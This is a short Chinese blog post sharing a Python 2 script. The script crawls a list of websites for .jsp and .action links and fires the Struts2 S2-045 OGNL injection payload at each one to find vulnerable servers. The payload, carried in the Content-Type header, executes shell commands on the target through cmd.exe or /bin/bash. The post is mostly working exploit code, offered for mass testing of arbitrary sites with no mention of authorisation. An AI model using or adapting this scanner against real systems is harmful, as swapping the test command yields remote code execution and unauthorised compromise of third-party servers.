【Python】批量爬取网站URL测试Struts2-045漏洞

1、概述都懒得写了。。。。

就是批量测试用的，什么工具里扣出来的POC，然后根据自己的理解写了个爬网站首页URL的代码。。。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import random
import httplib
import re
import os
import sys

#########################
##  作者：zzzzzhhhhhhh
##  Code功能
##    1、批量获取指定网站的URL
##    2、批量验证Struts2-045漏洞
##    BUG：121个左右根据网络状况会报错，清除已测试过的网址再测试就没啥问题。懵逼
###########################


# 出现ChunkedEncodingError问题，更改为HTTP 1.0
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = \'HTTP/1.0\'

# 存放内容
http_URL = []
http_website  = []

# 增加HTTP头部
def add_http(url):
    if "http://" not in url:
        url = \'http://\' + url
    return url

# 爬行首页URL
def curl_Site_URL(url):
    url = add_http(url)
    website = url  # 存储一下域名，路径碰路径
    # 获取网页内容
    try:
        r = requests.get(url)
    except requests.RequestException as e:
        print "error website:"+url
        return False
    data = r.text
    # 利用正则查找所有连接
    link_list = re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\\').+?(?=\\')", data)
    for url in link_list:
        filename = os.path.basename(url)  # 取出文件名
        (shotname, extension) = os.path.splitext(filename)  # 取出文件后缀
        if ((extension == ".jsp") or (extension == ".action")):  # 指定后缀检测
            if \'http://\' not in url:  # 检测是否有HTTP://
                url = website + url
                http_URL.append(url)    # 读取到列表里或者写入文件中
            else:
                http_URL.append(url)

## 2、验证Stuts2漏洞
def poc(url):
    url = add_http(url)
    try:
        a = random.randint(10000000, 20000000)
        b = random.randint(10000000, 20000000)
        c = a + b
        win = \'set /a \' + str(a) + \' + \' + str(b)
        linux = \'expr \' + str(a) + \' + \' + str(b)
        header = dict()
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"] = "%{(#nike=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#iswin?(#cmd=\'" + win + "\'):(#cmd=\'" + linux + "\')).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        r = requests.post(url, headers=header, timeout=5)
        if str(c) in r.text:
            return \'[S2-045 vul]\'+url
        else:
            return False
    except Exception:
        return False


# 读取文件函数
def read_file(file_path):
    # 判断文件路径是否存在，如果不存在直接退出，否则读取文件内容
    if not os.path.exists(file_path):
        print \'Please confirm correct filepath !\'
        sys.exit(0)
    else:
        with open(file_path, \'r\') as source:
            for line in source:
                http_website.append(line.rstrip(\'\r\n\').rstrip(\'\n\'))
    # 批量读取
    sum = 0
    for website in http_website:
        print website
        curl_Site_URL(website)


    # 批量验证
    for d in http_URL:
        result = poc(d)
        if result != False:
            print result


if __name__ == \'__main__\':
    file_str=raw_input(\'Input file IP.txt filepath eg:D:\\\\test.txt \n\')
    read_file(file_str)
    ## C:\\Users\\AT\\Desktop\\domain.txt

代码特效

txt里保存网站地址就可以了，爬虫还需要后续学习优化、添加功能。。。